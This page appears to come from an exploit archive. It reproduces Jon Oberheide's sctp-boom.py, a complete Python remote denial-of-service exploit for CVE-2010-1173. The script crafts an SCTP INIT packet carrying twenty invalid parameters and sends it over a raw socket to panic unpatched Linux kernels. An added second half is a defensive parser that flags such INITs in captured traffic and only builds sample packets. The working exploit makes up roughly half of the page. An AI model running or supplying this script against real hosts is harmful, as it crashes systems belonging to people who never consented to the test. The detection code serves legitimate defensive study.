Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS
Source: http://jon.oberheide.org  Author: Oberheide  Published: 2010-08-10

# From: http://jon.oberheide.org/files/sctp-boom.py
#!/usr/bin/env python

'''
  sctp-boom.py
 
  Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS
  Jon Oberheide <jon@oberheide.org>
  http://jon.oberheide.org
 
  Information:
 
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173

    The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the
    Linux kernel 2.6.33.3 and earlier, when SCTP is enabled, allows remote
    attackers to cause a denial of service (system crash) via an SCTPChunkInit
    packet containing multiple invalid parameters that require a large amount
    of error data.

  Usage:
 
    $ python sctp-boom.py 1.2.3.4 19000
    [+] sending malformed SCTP INIT msg to 1.2.3.4:19000
    ...
    [+] kernel should have panicked on remote host 1.2.3.4

  Requirements:
   
    * dnet: http://libdnet.sourceforge.net/
    * dpkt: http://code.google.com/p/dpkt/

'''

import os, sys, socket

def err(txt):
    print '[-] error: %s' % txt
    sys.exit(1)

def msg(txt):
    print '[+] %s' % txt

def usage():
    print >> sys.stderr, 'usage: %s host port' % sys.argv[0]
    sys.exit(1)

try:
    import dpkt
except ImportError:
    err('requires dpkt library: http://code.google.com/p/dpkt/')

try:
    import dnet
except ImportError:
    try:
        import dumbnet as dnet
    except ImportError:
        err('requires dnet library: http://libdnet.sourceforge.net/')

def main():
    if len(sys.argv) != 3:
        usage()

    host = sys.argv[1]
    port = int(sys.argv[2])

    try:
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err('requires root privileges for raw socket access')

    dst_addr = socket.gethostbyname(host)
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface['addr'].ip

    msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))

    invalid = ''
    invalid += '\x20\x10\x11\x73'
    invalid += '\x00\x00\xf4\x00'
    invalid += '\x00\x05'
    invalid += '\x00\x05'
    invalid += '\x20\x10\x11\x73'

    for i in xrange(20):
        invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'

    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    init.len = len(init)

    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173
    sctp.dport = port
    sctp.data = [ init ]

    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    ip.len = len(ip)

    print `ip`

    pkt = dnet.ip_checksum(str(ip))
    sock.send(pkt)

    msg('kernel should have panicked on remote host %s' % (dst_addr))

if __name__ == '__main__':
    main()
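The vulnerability note in the docstring above says the crash is triggered by an INIT chunk carrying many unrecognised parameters that each demand error-reporting data. The following added example is not part of Jon Oberheide's script or of this page: it parses the SCTP common header, walks the chunk and parameter TLVs of an INIT, counts the unrecognised parameters whose type bits request an "Unrecognized Parameter" report, and estimates the error-cause bytes a receiver would have to build for them, so that a sensor or packet-capture triage script can flag such traffic. The `max_unknown` threshold, the partial `KNOWN_INIT_PARAMS` set and the `build_init` sample builder are assumptions of this example; the sample packets are constructed inline and nothing is sent.

```python
import struct

SCTP_COMMON_HDR = 12   # source port, destination port, verification tag, checksum
CHUNK_HDR = 4          # chunk type, flags, length
INIT_FIXED = 16        # initiate tag, a_rwnd, outbound/inbound streams, initial TSN
CHUNK_INIT = 1

# Parameter types normally seen in an INIT (RFC 4960 / RFC 3758).
# Partial list: an assumption of this example, extend it for your environment.
KNOWN_INIT_PARAMS = {5, 6, 9, 11, 12, 0x8000, 0xC000}


def pad4(n):
    """Round a TLV length up to the 4-byte boundary SCTP pads to."""
    return (n + 3) & ~3


def parse_chunks(sctp_payload):
    """Yield (type, flags, body) for every chunk after the common header,
    raising ValueError when a length field runs past the packet."""
    off = SCTP_COMMON_HDR
    if len(sctp_payload) < off:
        raise ValueError('packet shorter than the SCTP common header')
    while off + CHUNK_HDR <= len(sctp_payload):
        ctype, flags, clen = struct.unpack_from('!BBH', sctp_payload, off)
        if clen < CHUNK_HDR or off + clen > len(sctp_payload):
            raise ValueError('malformed chunk length %d at offset %d' % (clen, off))
        yield ctype, flags, sctp_payload[off + CHUNK_HDR:off + clen]
        off += pad4(clen)


def parse_params(init_body):
    """Yield (type, value) for each TLV parameter in the variable part of an INIT body."""
    off = INIT_FIXED
    while off + 4 <= len(init_body):
        ptype, plen = struct.unpack_from('!HH', init_body, off)
        if plen < 4 or off + plen > len(init_body):
            raise ValueError('malformed parameter length %d at offset %d' % (plen, off))
        yield ptype, init_body[off + 4:off + plen]
        off += pad4(plen)


def assess_init(sctp_payload, max_unknown=8):
    """Count unrecognised INIT parameters that request an error report and
    estimate the 'Unrecognized Parameter' cause bytes a receiver would build.
    max_unknown is an arbitrary detection threshold (assumption of this example)."""
    unknown = 0
    error_bytes = 0
    for ctype, _flags, body in parse_chunks(sctp_payload):
        if ctype != CHUNK_INIT:
            continue
        for ptype, value in parse_params(body):
            if ptype in KNOWN_INIT_PARAMS:
                continue
            # RFC 4960 3.2.1: bit 0x4000 of the type asks the receiver to report
            # the parameter back; bit 0x8000 says keep processing after it.
            if ptype & 0x4000:
                unknown += 1
                # cause header (code + length, 4 bytes) plus the padded parameter TLV
                error_bytes += 4 + pad4(4 + len(value))
    return {'unknown_reported': unknown,
            'error_bytes': error_bytes,
            'suspicious': unknown > max_unknown}


def build_init(params, sport=0x1173, dport=19000):
    """Construct a minimal SCTP packet (common header + one INIT chunk) from a
    list of (type, value) parameters. Used only to build the constructed test
    input below; the checksum field is left zero because nothing is sent."""
    var = b''
    for ptype, value in params:
        plen = 4 + len(value)
        var += struct.pack('!HH', ptype, plen) + value + b'\x00' * (pad4(plen) - plen)
    body = struct.pack('!IIHHI', 0x20101173, 0xF400, 5, 5, 0x20101173) + var
    chunk = struct.pack('!BBH', CHUNK_INIT, 0, CHUNK_HDR + len(body)) + body
    return struct.pack('!HHII', sport, dport, 0, 0) + chunk


# Constructed samples: a normal INIT (supported address types + ECN capable)
# and one shaped like the malformed INIT described in the docstring above.
BENIGN_INIT = build_init([(12, b'\x00\x05'), (0x8000, b'')])
FLOOD_INIT = build_init([(0xC0FF, b'\xff\xff\xff\xff')] * 20)

if __name__ == '__main__':
    for name, pkt in (('benign', BENIGN_INIT), ('flood', FLOOD_INIT)):
        print(name, assess_init(pkt))
```

Running the script reports zero reported-unknown parameters for the benign INIT and twenty for the flood-shaped one, with an estimated 240 bytes of error-cause data. The parser raises `ValueError` rather than silently reading past the buffer when a chunk or parameter length field exceeds the packet, which is the failure mode a packet-inspection tool must handle before it can be trusted on untrusted traffic.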


 